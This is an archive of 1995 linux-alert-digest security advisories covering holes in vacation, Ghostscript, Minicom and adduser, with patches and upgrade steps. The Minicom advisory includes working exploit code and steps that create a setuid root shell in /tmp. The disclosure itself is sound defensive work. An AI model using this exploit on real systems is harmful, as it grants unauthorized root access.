- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMBaT34xFUz2t8+6VAQEo/AP/SThg3ZHwM3hklsMGujOcLUPisNuJxo50
sLkqQi0mlc2Oo3nFDzLG0mvoX9M5Jer0qp1osdLTlZaxztYfhJSGJJjoAjK91hBR
dw1BCdMwhwlrfizaVi1ZLMFmlFvX8YKEMAaLwuQdFHCo/KhSOlb/4rrMunGPdUtl
RtFXqQDDl6o=
=Po3y
- -----END PGP SIGNATURE-----
============================================================================
Alexander O. Yuriev Email: [email protected]
CIS Labs, TEMPLE UNIVERSITY WWW: http://bach.cis.temple.edu/personal/alex
Philadelphia, PA, USA
PGP Key: 1024/ADF3EE95 Fingerprint: AB4FE7382C3627BC 6934EC2A2C05AB62
Unless otherwise stated, everything above is my personal opinion and not an
opinion of any organisation affiliated with me.
=============================================================================
------------------------------
From: Jeff Uphoff
Date: Wed, 2 Aug 1995 13:04:45 -0400
Subject: SECURITY ALERT: Dangerous hole in vacation v1.0.
- -----BEGIN PGP SIGNED MESSAGE-----
A major security hole in the Linux version of 'vacation' has been
detected and corrected. This hole affects version 1.0 of 'vacation' as
ported to Linux by Harald Milz (from Eric Allman's
original BSD source) and found on sunsite.unc.edu and other FTP sites
(and thus commonly used on Linux systems).
Note: The hole was introduced in the Linux port/version and does not
appear to affect other, non-Linux-specific, versions of vacation.
The hole involved passing the Subject: and From: headers of the incoming
e-mail message to 'sed' and 'sendmail' via a system() call. The extreme
danger of this, especially in a program that is taking input from remote
systems, should be apparent to most people that are familiar with the
system() call internals.
Thanks go to Olaf Kirch for detecting this hole and
for coding an initial fix, and to Harald Milz for enhancing Olaf's fix
to provide the same functionality as his (Harald's) previous version.
Version 1.1 (recently uploaded to sunsite.unc.edu) is a "safe" version.
UNDER _NO_ CIRCUMSTANCES SHOULD VERSION 1.0 BE USED!
Here is the LSM entry for the updated version:
Begin3
Title: Automatic mail answering program for Linux
Version: 1.1
Entered-Date: July 29, 1995
Description: This is the port of the 386bsd vacation program to Linux.
Vacation is the automatic mail answering program found
on many Unix systems.
This is a security fixed version. PLEASE DON'T USE vacation-1.0
ANY LONGER!
Keywords: vacation, mail answering
Author: Eric Allman (?)
Maintained-By: Harald Milz ([email protected])
Primary-Site: sunsite.unc.edu /pub/Linux/system/Mail/mailhandlers
28 KB vacation-1.1.tar.gz
Original-Site: agate.berkeley.edu (as of Nov 16, 1993)
Platforms: GCC 2.6.3, libc 5.0.9 or libc 4.7.2
Copying-Policy: Copyright (c) 1983, 1987 Regents of the University of California
changes relative to the original version: GPL
End
In addition to Sunsite, the updated version is available in
linux.nrao.edu:/pub/linux/security/vacation/. MD5 checksum of the
tar-file on linux.nrao.edu is:
f37ab91e18de1caa2c657509d8eb073b vacation-1.1.tar.gz
Note: For those that get syslog messages from 'sendmail' saying "mailer
prog died with signal 13" when running this new v1.1 (it's a SEGV; the
13 is octal), try the following patch (Harald plans on adding this, as
well as a couple of other slight modifications that I have made, in a
future public update to the newly-released v1.1):
diff -u --recursive 1.1-hm/vacation.c 1.1/vacation.c
--- 1.1-hm/vacation.c Sat Jul 29 18:08:57 1995
+++ 1.1/vacation.c Sun Jul 30 13:39:41 1995
@@ -184,8 +184,8 @@
setreply();
(void) gdbm_close(db);
sendmessage(pw->pw_name);
- }
- (void) gdbm_close(db);
+ } else
+ (void) gdbm_close(db);
exit(0);
/* NOTREACHED */
}
- - --
Jeff Uphoff - systems/network admin. | [email protected]
National Radio Astronomy Observatory | [email protected]
Charlottesville, VA, USA | http://linux.nrao.edu/~juphoff/
- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMB+wBrxzFUpUTHgFAQGuwwQA1XLiDP93tUE84d0nQOz34iM6GtHBF4AT
9IXsHNrgZpAwUcbYsYTlmvICrrxqyozBkfqGYTpH44ajV5dGcqb9FZmyO//x7/JY
LaejDEnp8ByigDf0++w7cxoRF7gwWFeNq2WvpFgbgqLWEer+Ci/mBKkEo0FY397E
TQWmk4ekFJ8=
=akI7
- -----END PGP SIGNATURE-----
------------------------------
End of linux-alert-digest V1 #6
*******************************
linux-alert-digest/1995/v01.n007100664 1767 1767 5126 6021013402 15255 0ustar majdommajdomFrom: owner-linux-alert-digest
To: [email protected]
Subject: linux-alert-digest V1 #7
Reply-To: linux-security
Errors-To: owner-linux-alert-digest
Precedence: bulk
linux-alert-digest Wednesday, 30 August 1995 Volume 01 : Number 007
Ghostscript problem
----------------------------------------------------------------------
From: [email protected] (Olaf Kirch)
Date: Tue, 22 Aug 1995 21:29:19 +0200 (MET DST)
Subject: Ghostscript problem
- -----BEGIN PGP SIGNED MESSAGE-----
Hi all,
There's another problem with ghostscript that makes you vulnerable to
attacks via postscript code. Ghostscript has a file type that lets you
execute arbitrary commands through the shell. While the -dSAFER option
to gs protects you from ordinary file write/rename/removal attacks, it
does not check for this special file type. The hole is present in all
GNU versions up to 2.6.2 and Aladdin versions earlier than 3.22.
Below's a fix to gs_init.ps that fixes this.
Please also make sure that all programs that use ghostscript set the -dSAFER
option. ghostview 1.5 does by default, but version 1.4 does not. I'd
suggest you also check your ps printer filter if you print postscript
files using gs, and xdvi if you use a version that uses ghostscript to
display postscript \special's. I checked only xdvi-20, and it's safe.
Olaf
PS: Patch follows. PGP will garble initial `-' characters in the
patch; make sure to replace `- -' with `-' before applying it.
- - ------------------------------------------------------------------
- - --- gs_init.ps.orig Sun Aug 20 23:22:01 1995
+++ gs_init.ps Sun Aug 20 23:22:46 1995
@@ -302,7 +302,8 @@
% If we want a "safer" system, disable some obvious ways to cause havoc.
SAFER not { (%END SAFER) .skipeof } if
/file
- - - { dup (r) eq
+ { exch dup /..fname exch def exch
+ dup (r) eq ..fname (%pipe%*) .stringmatch not and
{ file }
{ /invalidfileaccess signalerror }
ifelse
- - ------------------------------------------------------------------
- - --
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
[email protected] | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
For my PGP public key, finger [email protected].
- -----BEGIN PGP SIGNATURE-----
Version: 2.6
iQCVAgUBMDowAOFnVHXv40etAQH3swP8CrvRFW2+wXgqJqQTdCVIgUGk/QasREgP
PPwaYKy/oD0ak2HFXXdvkUoMbGlhDqlVbDY7cm0M7wuTAxpejtPxspDlacvQSuO7
XA50N9++2P5npmFWa6IBupz4X69nPlnAVBjk/qF4PbpMKdrgIWx23CqecccBrmeC
kezpwwcp32Y=
=dhSU
- -----END PGP SIGNATURE-----
------------------------------
End of linux-alert-digest V1 #7
*******************************
linux-alert-digest/1995/v01.n008100664 1767 1767 5602 6030735402 15270 0ustar majdommajdomFrom: owner-linux-alert-digest
To: [email protected]
Subject: linux-alert-digest V1 #8
Reply-To: linux-security
Errors-To: owner-linux-alert-digest
Precedence: bulk
linux-alert-digest Saturday, 23 September 1995 Volume 01 : Number 008
Minicom 1.70
----------------------------------------------------------------------
From: Aleph One
Date: Fri, 15 Sep 1995 13:05:09 -0500 (CDT)
Subject: Minicom 1.70
Program: Minicom 1.70.
Problem: Minicom users defined in its minicom.users file can gain root access.
Explanation: Some distributions install minicom setuid root so that it
can access callout devices (/dev/cua0, /dev/ttyS0, /dev/modem).
Minicom also allows users to create scripts that can be used
to automate logins, and other tasks. This scripts are interpreted
by runscript(1). runscript(1) allows arbitrary shell escapes.
Minicom forks and exec runscript(1) without calling setreuid(2)
to drop priviledges. Therefore it fallows the user can execute
arbitrary commands with the privilege of minicom.
To complicate matters even more some distributions install
minicom.users file with default user names. In the case of
Slackware this are: gonzo, satan, snake. If you create accounts
with this names on you system you are oppening you self to
a security breach. If you have accounts under those name you might
want to disable them until security is restored. If a users
asks you to change their username to one of those or to create an
account with one of those names DO NOT DO IT!
Exploit: Create a program that sets its real and effective uid to 0,
then executes a shell command such as copying a shell and making it
setuid root. This will do:
#include
#include
void main() {
setreuid(0,0);
system("/bin/cp /bin/sh /tmp/mysh");
system("/bin/chmod 4777 /tmp/mysh");
}
Create a minicom script that will execute our program.
echo '! /tmp/gime' > /tmp/foo
Start minicom and type Control-A then G. Select C and enter
the name for our minicom script (/tmp/foo). Hit return and
execute the script. Exit minicom and you should find a setuid sh
named as /tmp/mysh.
Solution: Upgrade to minicom 1.71. Futhermore minicom should not be suid root.
Minicom should be of the same group as the dialout device (normally
tty, dialout, modem, or uucp), and setguid. On a side note many
distributions have the correct premission in the /dev/cua devices
but not on their equivalent /dev/ttyS devices. This is the case of
debian 0.93. To fix chown root.dialout /dev/ttyS*; chmod o-rwx
/dev/ttyS*. Make sure that this does brake your other serial devices
such as your mouse.
Aleph One / [email protected]
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint B6 C3 BD 8A 7A 79 03 55 CC 24 F4 01 2B BD 90 3A
------------------------------
End of linux-alert-digest V1 #8
*******************************
linux-alert-digest/1995/v01.n009100664 1767 1767 11752 6043636201 15315 0ustar majdommajdomFrom: owner-linux-alert-digest
To: [email protected]
Subject: linux-alert-digest V1 #9
Reply-To: linux-security
Errors-To: owner-linux-alert-digest
Precedence: bulk
linux-alert-digest Thursday, 26 October 1995 Volume 01 : Number 009
URGENT: Linux Security FAQ Update#7: adduser-1.0 script vulnerability
----------------------------------------------------------------------
From: alex
Date: Tue, 17 Oct 1995 20:34:06 -0400 (EDT)
Subject: URGENT: Linux Security FAQ Update#7: adduser-1.0 script vulnerability
[NB: I didn't write the adduser replacement; I just modified it. --okir]
- -----BEGIN PGP SIGNED MESSAGE-----
adduser-1.0 Security Vulnerability
LINUX SECURITY FAQ UPDATE
October 17, 1995 15:30:01 EST
Copyright (C) 1995 Alexander O. Yuriev ([email protected])
CIS Laboratories
TEMPLE UNIVERSITY
U.S.A.
=============================================================================
This is an official update of the Linux security FAQ, and it is supposed to
be signed by one of the following PGP keys:
1024/544C7805 1994/07/17 Jeffrey A. Uphoff
Jeffrey A. Uphoff
1024/EFE347AD 1995/02/17 Olaf Kirch
1024/ADF3EE95 1995/06/08 Linux Security FAQ Primary Key
Unless you are able to verify at least one of the signatures, please be very
careful when following instructions.
Linux Security WWW: http://bach.cis.temple.edu/linux/linux-security/
linux-security & linux-alert mailing list archives:
ftp://linux.nrao.edu/pub/linux/security/list-archive/
=============================================================================
VULNERABILITY
*************
The adduser 1.0 script used on a lot of systems to add a
new user account has a potential vulnerability that in some
cases can allow an owner of the created account to gain
unauthorized root access. The original version of this
script had a mistake in the algorithm used to generate a
new UID, which on systems that had accounts with UID
close to 65535 (i.e. accounts 'nobody' with UID -2 or -1)
caused the newly generated account to receive UID 0.
AFFECTED DISTRIBUTIONS:
***********************
RED HAT
=======
Red Hat 2.0 uses a vulnerable version of the adduser
script. Fortunately, Red Hat 2.0 systems by default
do not have any accounts with UID higher than 1000.
Nevertheless, an updated package is available from
the following places:
ftp://ftp.pht.com/pub/linux/redhat/redhat-2.0/updates/RPMS/adduser-1.1-1.i386.rpm
ftp://bach.cis.temple.edu/pub/Linux/Security/DISTRIBUTION-FIXES/RedHat2.0/adduser-1.1-1.i386.rpm
ftp://linux.nrao.edu/pub/people/alex/DISTRIBUTION-FIXES/RedHat2.0/adduser-1.1-1.i386.rpm
Please verify the MD5 message digest of the
upgrade before installing. It has to be :
MD5 (adduser-1.1-1.i386.rpm) = 543fab52c0cf6ae4751858d08cf958bd
The upgrade can be performed using command
rpm -USvh adduser-1.1-1.i386.rpm
CALDERA DESKTOP
===============
Unfortunately at this time we are not able to
provide adequate information about vulnerability
of the Caldera Desktop, though due to the fact that
Caldera Desktop is based up RedHat 2.0, we recommend
installing the updated adduser script.
SLACKWARE
=========
By default Slackware does not use the vulnerable
adduser script, although we do recommend that you
check. If it does, replace your adduser script with
the one located on:
ftp://bach.cis.temple.edu/pub/Linux/Security/adduser-1.1-ok.gz
ftp://linux.nrao.edu/pub/people/alex/adduser-1.1-ok.gz
Please verify the MD5 message digest of the
adduser-1.1-ok.gz before installing it. It has to be:
MD5 (adduser-1.1-ok.gz) = ceadb362f6761c59fc8e37e5ef7dcd29
OTHER DISTRIBUTIONS:
Please follow the instructions under Slackware section.
THE REPLACEMENT SCRIPT
**********************
The replacement script was written by Olaf Kirch some time
ago (probably when we discussed the possibility of roll-over
in the linux-security mailing list). This script also uses
a bit different algorithm of user ID allocation (first
unused userid after uid of 500).
CREDITS
*******
The following people helped in preparing this update and fix:
Marc R. Ewing